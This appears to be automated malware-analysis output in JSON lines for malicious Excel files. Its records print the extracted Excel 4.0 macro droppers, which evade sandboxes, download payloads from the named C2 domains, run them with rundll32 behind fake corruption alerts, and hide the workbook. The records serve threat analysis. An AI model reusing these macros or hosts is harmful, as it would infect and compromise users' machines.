{"version":"0.2","sample":{"sample":"","kind":"file","target":"059d186dc61bec4bffe19de157b7407390a77cad3e1964febfde4ec2e9609e3b"},"analysis":{"reported":"2020-04-09T16:14:43Z","score":10},"files":[{"filename":"059d186dc61bec4bffe19de157b7407390a77cad3e1964febfde4ec2e9609e3b","filesize":167936,"md5":"3d82dfe2e542175014678dfd45db8e21","sha1":"984cb6ab5bd814901034bfed8c2e7fff7b2d7025","sha256":"059d186dc61bec4bffe19de157b7407390a77cad3e1964febfde4ec2e9609e3b","sha512":"c5db53f538098a046c0540344ee381c60bddfa3a0ad3ed357cf5b1d850dcec1edd107df7864294663c2e3c00ee59a95ff965882ea20d47dba1a6327c5c8eb921","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"059d186dc61bec4bffe19de157b7407390a77cad3e1964febfde4ec2e9609e3b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"qoI6mQxdl0\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"05aeb608ee8f1582b457897c7dfc88cbc02d67ef5c1692e817ff0208f335d127"},"analysis":{"reported":"2020-04-09T16:14:43Z","score":10},"files":[{"filename":"05aeb608ee8f1582b457897c7dfc88cbc02d67ef5c1692e817ff0208f335d127","filesize":167936,"md5":"187b7b879a2d375508f057ca6bb76179","sha1":"7a801a1f50aba22e3921dbee3dd8d9f5a6f142fb","sha256":"05aeb608ee8f1582b457897c7dfc88cbc02d67ef5c1692e817ff0208f335d127","sha512":"43fe1108f0a6225862c0d06c6e94677e6930920d5db11a06127c85a7667eb29dd67cb6568b4f91a24e2b82659b760220876919b0f9bd48024437296e90950895","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"05aeb608ee8f1582b457897c7dfc88cbc02d67ef5c1692e817ff0208f335d127.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"MGEIWNpq3R\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"05ceee4cb4738bd296097a72baf83eab5e36f6da59828ba4817108f966b4b079"},"analysis":{"reported":"2020-04-09T16:14:43Z","score":10},"files":[{"filename":"05ceee4cb4738bd296097a72baf83eab5e36f6da59828ba4817108f966b4b079","filesize":185344,"md5":"b200416573707d23b0c10bf1bc6d7722","sha1":"4817b8273a144e7abc405741963b6baa190905ee","sha256":"05ceee4cb4738bd296097a72baf83eab5e36f6da59828ba4817108f966b4b079","sha512":"4dcfcd5e7be949fc5f01cfdee215d0202ceef043887808cc4c49ebe78f738a740ff02294b895ff5de178fe1b0e5ecdf748116721b40a41ea3dce3d128d1fda1c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"05ceee4cb4738bd296097a72baf83eab5e36f6da59828ba4817108f966b4b079.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"05e1d128560b93d6b8261124452e694532dde5b19b1165dfca956dc5980e001e"},"analysis":{"reported":"2020-04-09T16:14:43Z","score":10},"files":[{"filename":"05e1d128560b93d6b8261124452e694532dde5b19b1165dfca956dc5980e001e","filesize":209920,"md5":"95452c04b878d943cc68480f80c8c378","sha1":"9d9c7c41897b067f6f66c96d4193545e679cdc5d","sha256":"05e1d128560b93d6b8261124452e694532dde5b19b1165dfca956dc5980e001e","sha512":"9c9693b6fcd2d4d2a19bfb04964404b1d62ecef0dd7b84ef7ef74f17e627668a017902ac210aa027b309b2b258c20281d56421981c72bae59c349b395b490409","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"05e1d128560b93d6b8261124452e694532dde5b19b1165dfca956dc5980e001e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Zc0gFi4U6p\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"05f4d046efdae709d1076e7d0328d8b3828350d0234ae955e36b342f24da6389"},"analysis":{"reported":"2020-04-09T16:14:43Z","score":10},"files":[{"filename":"05f4d046efdae709d1076e7d0328d8b3828350d0234ae955e36b342f24da6389","filesize":185344,"md5":"237577eb84c3b2bfee3a3ceddf1da24a","sha1":"e360d3134f332e298438e14ed3776b516c66303f","sha256":"05f4d046efdae709d1076e7d0328d8b3828350d0234ae955e36b342f24da6389","sha512":"28891d6771882f5757615dd0532b1f0dbb56bb3ef94920c9083f4a839fae1959b61871f5953fbc9f8a91b88ec7edbeb21d739f461a995d8d2b8f3355f59ac132","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"05f4d046efdae709d1076e7d0328d8b3828350d0234ae955e36b342f24da6389.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"05f772e15ac5279995b0a598da6b076710de80ff310993c718c77c07f03a1673"},"analysis":{"reported":"2020-04-09T16:14:43Z","score":10},"files":[{"filename":"05f772e15ac5279995b0a598da6b076710de80ff310993c718c77c07f03a1673","filesize":152576,"md5":"40aaa6e194347e4d13c26a53bc7108f0","sha1":"4c33a278a95f00dfbb02f2ea63cb32b4d582bc11","sha256":"05f772e15ac5279995b0a598da6b076710de80ff310993c718c77c07f03a1673","sha512":"57e44adc8d066a5fb357d84b60780b595772a3dc17874b05222fc7fe41de973af8c444e7e7c9124387848ac98e7ebfc316ceaac00eeb09706d75e5155d09ca4a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"05f772e15ac5279995b0a598da6b076710de80ff310993c718c77c07f03a1673.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"yxyWtmkyz3\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"062ac04ad4b11e3b3134ba878aab3b33ad415797d36f5a85ddd7773ab0954a58"},"analysis":{"reported":"2020-04-09T16:14:43Z","score":10},"files":[{"filename":"062ac04ad4b11e3b3134ba878aab3b33ad415797d36f5a85ddd7773ab0954a58","filesize":112128,"md5":"cde6912bcd720dc2c93e69843a15717c","sha1":"ef0f941bf597febb931c7e1758666f1b97b18ee7","sha256":"062ac04ad4b11e3b3134ba878aab3b33ad415797d36f5a85ddd7773ab0954a58","sha512":"b4b52d35c8080c3e21c1444ca3ee0e12445c7110fa91a9c8e32c811548ea24cb5a2d816f602fb310a7c18485305913efeb71768218d3246dd84bf01e702839d8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"062ac04ad4b11e3b3134ba878aab3b33ad415797d36f5a85ddd7773ab0954a58.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"06419199ae8dc11ac4ee2113a47cc84d637df5b18f8bcef31f27ffcf163c254c"},"analysis":{"reported":"2020-04-09T16:14:43Z","score":10},"files":[{"filename":"06419199ae8dc11ac4ee2113a47cc84d637df5b18f8bcef31f27ffcf163c254c","filesize":209408,"md5":"c3b096feb3da5c1cf4d3aede3a1f0106","sha1":"ce9806bd91cb0c76c05074a8c264367681faea02","sha256":"06419199ae8dc11ac4ee2113a47cc84d637df5b18f8bcef31f27ffcf163c254c","sha512":"fa7731682c16a3ed60fb639b2ff8ebeeb8c033395898282138f84470b90c8052e14fe0a3887c083b438425638b48abac01c1f8a1d4084aa075bdb5631d3ebe64","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"06419199ae8dc11ac4ee2113a47cc84d637df5b18f8bcef31f27ffcf163c254c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"E9NcXY0clg\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0643b64cbad79f655b3617c22706fe2bb51be1b16015d50604b47fa6de113f4a"},"analysis":{"reported":"2020-04-09T16:14:43Z","score":10},"files":[{"filename":"0643b64cbad79f655b3617c22706fe2bb51be1b16015d50604b47fa6de113f4a","filesize":112640,"md5":"66240735947702a604a83b726d68eb52","sha1":"ec217dae98a235856ff8ebefa5e2143fbce6a102","sha256":"0643b64cbad79f655b3617c22706fe2bb51be1b16015d50604b47fa6de113f4a","sha512":"9ada27268624d2d9c8bc210b24a75de6f43fa7c20a03f36367bd0745732092488fc6c71f1d1380630dc0f9fafa109f9115e3828eb08b6dd7e39df9572f32a802","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0643b64cbad79f655b3617c22706fe2bb51be1b16015d50604b47fa6de113f4a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"064b8f50d67edf60597b6e82b02900288977dd86726297f356cbd389f43ac7e7"},"analysis":{"reported":"2020-04-09T16:14:43Z","score":10},"files":[{"filename":"064b8f50d67edf60597b6e82b02900288977dd86726297f356cbd389f43ac7e7","filesize":62976,"md5":"b6fc88b649faa91ba82909d817bc82d7","sha1":"597530b62a10152c6c1e97e477c1c90e95437c14","sha256":"064b8f50d67edf60597b6e82b02900288977dd86726297f356cbd389f43ac7e7","sha512":"95e9c0275f34f632ef243702d6d9c7faeb1ab6d9e7c0349ff2ce3b8363ee881e0a1cb63c8ecbf5423ba0d6ef3d96e9723254d57b0486e4fc8a4252c69e6c94e0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"064b8f50d67edf60597b6e82b02900288977dd86726297f356cbd389f43ac7e7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"SUM(R$19C$13,R$19C$15,R$19C$16,R$19C$17,R$19C$19,R$19C$21)\nSUM(R$43C$13,R$22C$15,R$43C$16,R$43C$17,R$43C$19,R$22C$21)\nSUM(R$19C$15,R$19C$16,R$19C$17,R$19C$19,R$19C$21)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0658b488343881d4b2dca9058fe44ba25a1eb899420d469e6409b70e7ce581a9"},"analysis":{"reported":"2020-04-09T16:14:43Z","score":10},"files":[{"filename":"0658b488343881d4b2dca9058fe44ba25a1eb899420d469e6409b70e7ce581a9","filesize":225280,"md5":"763c4c673a5c019f0b8dba6f2aece9df","sha1":"13d980dc08802f3157b27b7bfa9e588fafc985db","sha256":"0658b488343881d4b2dca9058fe44ba25a1eb899420d469e6409b70e7ce581a9","sha512":"124ec20334fefdf6994b3f684d910bf227c74a0dd410c4c246204ac86b0951e999662090db88b4cf0f933d7a11f4d9b4b647e4b016cdb14e573265530381d40e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0658b488343881d4b2dca9058fe44ba25a1eb899420d469e6409b70e7ce581a9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1p7xBUbX0x\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"066d4643e6510b0316ff932b1c814574a5a54dd960c1b4efb873cfddcf7ed08c"},"analysis":{"reported":"2020-04-09T16:14:43Z","score":10},"files":[{"filename":"066d4643e6510b0316ff932b1c814574a5a54dd960c1b4efb873cfddcf7ed08c","filesize":141824,"md5":"5a87036b5c6e0a61f799d069f47da898","sha1":"608f0b30aa583b7c7a2dbec3e908e6b714688186","sha256":"066d4643e6510b0316ff932b1c814574a5a54dd960c1b4efb873cfddcf7ed08c","sha512":"e59946a54ba0da43e1ce7e20e1025660b20248d7b0a80e50d9a74b5beb51b9bb3213dbdcecbbc71901d9f0401933dc47587e57109c035237a94a6377184570c4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"066d4643e6510b0316ff932b1c814574a5a54dd960c1b4efb873cfddcf7ed08c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"zyOzFZgefB\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0670b0a74f204d5992028dd2459d2ca33e991f9b54cf24e13830c06eb081d8e3"},"analysis":{"reported":"2020-04-09T16:14:43Z","score":10},"files":[{"filename":"0670b0a74f204d5992028dd2459d2ca33e991f9b54cf24e13830c06eb081d8e3","filesize":219136,"md5":"01aa9ff09d09fb87eb47e4f4cee1dc23","sha1":"4defc1a33e05eaf1e908d4c066d8584d8080e5a5","sha256":"0670b0a74f204d5992028dd2459d2ca33e991f9b54cf24e13830c06eb081d8e3","sha512":"96b9a048b31c6aa2273464a2d462bbe1a06f815e148323dceb478303b73ac66e7f04aef8e124d97ab51cb01446ea3d31474f881f141da73d0b26d330c3a6073d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0670b0a74f204d5992028dd2459d2ca33e991f9b54cf24e13830c06eb081d8e3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://kacper-formela.pl/wp-smart.php","http://braeswoodfarmersmarket.com/wp-smart.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://kacper-formela.pl/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://braeswoodfarmersmarket.com/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bqg85ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"TqZcqkDZWq\",TRUE)\nGOTO(R$1C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"06809622a9c9bff5d72cfade8d3396083b18885da1480042f6bd11dd86507166"},"analysis":{"reported":"2020-04-09T16:14:43Z","score":10},"files":[{"filename":"06809622a9c9bff5d72cfade8d3396083b18885da1480042f6bd11dd86507166","filesize":168448,"md5":"e358c6fe52dd3a0144250d313c0d5132","sha1":"5036177c710d868bf4c218ca255d0bd402993be7","sha256":"06809622a9c9bff5d72cfade8d3396083b18885da1480042f6bd11dd86507166","sha512":"bae7ea3d6ac8946e0de1a0b9b092bb14d153933d46010b821b8040dc543b1d881392d1059e5aeba293c3e32527484556fba8b73415e64236ad2e1a1ee4ebcf09","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"06809622a9c9bff5d72cfade8d3396083b18885da1480042f6bd11dd86507166.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"iuHpXWEskW\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0688023bce682a5ad68ab3880fae5170d5b780be1c8130fb5f13fbef7f10fff0"},"analysis":{"reported":"2020-04-09T16:14:44Z","score":10},"files":[{"filename":"0688023bce682a5ad68ab3880fae5170d5b780be1c8130fb5f13fbef7f10fff0","filesize":152576,"md5":"3199ce79366e7ec602fa0ae47ffdf9a6","sha1":"a618032b078baad47bdaf44d868a8fbc1554bc32","sha256":"0688023bce682a5ad68ab3880fae5170d5b780be1c8130fb5f13fbef7f10fff0","sha512":"8d6a66731d64b6567680394b1aa5861aaf8670de5726a656fe7b210c1d39ac33b929e13dd3e4b9b653c30d42070f7c46417df736fd84c50cbe83c5e03c2a87e3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0688023bce682a5ad68ab3880fae5170d5b780be1c8130fb5f13fbef7f10fff0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"PRODUCT(\"old\",\"Sortation\")\nPRODUCT(R$16C$9,\"Sortation\")\nIF(R$2C$12\u003c7,R$89C$13,R$90C$13)\nSUM(R$2C$15,0.027)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"069a350fe184c79a7554e880ab0c1513825afc2df6eb0d0f53b536f767a46387"},"analysis":{"reported":"2020-04-09T16:14:44Z","score":10},"files":[{"filename":"069a350fe184c79a7554e880ab0c1513825afc2df6eb0d0f53b536f767a46387","filesize":214016,"md5":"2d246df8e08fbe8f596e774ed2d325f3","sha1":"7392a9361336b6bea8a832394f1540c48f91347f","sha256":"069a350fe184c79a7554e880ab0c1513825afc2df6eb0d0f53b536f767a46387","sha512":"0d48ce961912b797120b010c7fc6bc1b34e1738fecb4302b0c5b3995ce4b63dbcd7b312b2bcc53298b3552805012aad24cc641cef01751402ac0e6885250fc2e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"069a350fe184c79a7554e880ab0c1513825afc2df6eb0d0f53b536f767a46387.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv42g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv42g\",\"c:\\Users\\Public\\bug65ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"CssOlESvQW\",TRUE)\nGOTO(R$0C$18)"}}}]}
